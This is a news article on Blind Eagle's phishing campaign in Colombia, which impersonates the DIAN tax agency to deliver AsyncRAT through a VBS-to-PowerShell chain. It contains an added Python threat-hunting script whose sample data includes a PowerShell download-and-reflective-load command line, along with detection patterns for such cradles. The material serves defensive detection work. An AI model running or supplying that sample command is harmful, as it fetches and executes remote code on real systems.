
Blind Eagle Hackers Target Key Industries in Colombia

by crpt os


Feb 28, 2023Ravie LakshmananCyber Threat / Malware

The threat actor known as Blind Eagle has been linked to a new campaign targeting various key industries in Colombia.

The activity, which was detected by the BlackBerry Research and Intelligence Team on February 20, 2023, is also said to encompass Ecuador, Chile, and Spain, suggesting a slow expansion of the hacking group’s victimology footprint.

Targeted entities include health, financial, law enforcement, immigration, and an agency in charge of peace negotiation in Colombia, the Canadian cybersecurity company said.

Blind Eagle, also known as APT-C-36, was recently covered by Check Point Research, detailing the adversary’s advanced toolset comprising Meterpreter payloads that are delivered via spear-phishing emails.

The latest set of attacks involves the group impersonating the Colombian government tax agency, the National Directorate of Taxes and Customs (DIAN), to phish its targets using lures that urge recipients to settle “outstanding obligations.”

The craftily designed email messages come with a link pointing to a PDF file that’s purportedly hosted on DIAN’s website, but actually deploys malware on the targeted system, effectively launching the infection chain.

“The fake DIAN website page contains a button that encourages the victim to download a PDF to view what the site claims to be pending tax invoices,” BlackBerry researchers said.


“Clicking the blue button initiates the download of a malicious file from the Discord content delivery network (CDN), which the attackers are abusing in this phishing scam.”

The downloaded “PDF” is in fact an obfuscated Visual Basic Script (VBS). When the victim opens it, the script invokes PowerShell to retrieve a .NET-based DLL, which in turn loads AsyncRAT into memory.

“A malicious [remote access trojan] installed on a victim’s machine enables the threat actor to connect to the infected endpoint any time they like, and to perform any operations they desire,” the researchers said.


Also of note is the threat actor’s use of dynamic DNS services like DuckDNS for its command-and-control infrastructure, which lets the operators repoint compromised hosts to new servers without touching the implant itself.
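The chain described above (a script dropped from the Discord CDN, a script host spawning PowerShell with a download-and-reflective-load cradle, and a DuckDNS domain used for command and control) leaves three observable stages that can be hunted for independently and then correlated per host. The following is an added example written for this article, not code from BlackBerry or The Hacker News. The log records, field names, host names, URLs and domains are all constructed for the example and are not indicators from the report; only the stage behaviours (Discord CDN download, wscript-to-PowerShell with an in-memory loader, DuckDNS resolution) come from the text.

```python
"""Hunt for the three stages of the Blind Eagle chain in process, proxy and DNS telemetry.

Added example, not the researchers' code. Field names (type, host, parent_image,
image, cmdline, url, query) are assumptions, not any particular SIEM schema.
"""
import re
from urllib.parse import urlsplit

# Constructed sample telemetry. ws01 shows all three stages; ws02 is benign noise.
SAMPLE_EVENTS = [
    {"type": "network", "host": "ws01",
     "url": "https://cdn.discordapp.com/attachments/1/2/Factura_DIAN.vbs"},
    {"type": "process", "host": "ws01",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"[Reflection.Assembly]::Load("
                "(New-Object Net.WebClient).DownloadData("
                "'https://cdn.discordapp.com/attachments/1/2/update.dll'))\""},
    {"type": "dns", "host": "ws01", "query": "facturacion-dian.duckdns.org"},
    {"type": "process", "host": "ws02",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"type": "dns", "host": "ws02", "query": "www.dian.gov.co"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
PAYLOAD_EXT = (".vbs", ".vbe", ".js", ".jse", ".ps1", ".dll", ".exe", ".hta", ".lnk")
# DuckDNS is the provider named in the report; add other dynamic-DNS suffixes you track.
DYN_DNS_SUFFIXES = ("duckdns.org",)

# A download cradle plus a reflective .NET load on the same command line.
CRADLE_RE = re.compile(r"DownloadData|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)
LOADER_RE = re.compile(r"Reflection\.Assembly", re.I)


def basename(path):
    """Last path component, lower-cased, tolerant of / or \\ separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_script_host_to_powershell(ev):
    if ev["type"] != "process":
        return None
    if basename(ev["parent_image"]) in SCRIPT_HOSTS and basename(ev["image"]) in POWERSHELL:
        return "script-host-spawned-powershell"
    return None


def rule_in_memory_loader(ev):
    if ev["type"] != "process" or basename(ev["image"]) not in POWERSHELL:
        return None
    if CRADLE_RE.search(ev["cmdline"]) and LOADER_RE.search(ev["cmdline"]):
        return "powershell-download-and-reflective-load"
    return None


def rule_discord_cdn_payload(ev):
    if ev["type"] != "network":
        return None
    parts = urlsplit(ev["url"])
    if parts.hostname == "cdn.discordapp.com" and parts.path.lower().endswith(PAYLOAD_EXT):
        return "discord-cdn-payload-download"
    return None


def rule_dynamic_dns(ev):
    if ev["type"] != "dns":
        return None
    q = ev["query"].lower().rstrip(".")
    if any(q == s or q.endswith("." + s) for s in DYN_DNS_SUFFIXES):
        return "dynamic-dns-resolution"
    return None


RULES = [rule_script_host_to_powershell, rule_in_memory_loader,
         rule_discord_cdn_payload, rule_dynamic_dns]


def hunt(events):
    """Return (host, rule_tag) for every event that matches a rule."""
    return [(ev["host"], tag) for ev in events for rule in RULES if (tag := rule(ev))]


def hosts_with_chain(events, min_stages=2):
    """Hosts on which at least min_stages distinct rules fired; single hits stay as leads."""
    stages = {}
    for host, tag in hunt(events):
        stages.setdefault(host, set()).add(tag)
    return {h for h, tags in stages.items() if len(tags) >= min_stages}


if __name__ == "__main__":
    for host, tag in hunt(SAMPLE_EVENTS):
        print(f"{host}: {tag}")
    print("escalate:", sorted(hosts_with_chain(SAMPLE_EVENTS)))
```

Each rule alone is noisy in a real estate (administrators do run PowerShell from logon scripts, and Discord attachments are downloaded legitimately), which is why `hosts_with_chain` only escalates a host once two different stages have fired on it; the single hits are still worth keeping as hunting leads.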

Blind Eagle is suspected to be a Spanish-speaking group owing to the use of the language in its spear-phishing emails. However, it’s currently unclear where the threat actor is based and whether their attacks are motivated by espionage or financial gain.

“The modus operandi used has mostly stayed the same as the group’s previous efforts – it is very simple, which may mean that this group is comfortable with its way of launching campaigns via phishing emails, and feels confident in using them because they continue to work,” BlackBerry said.
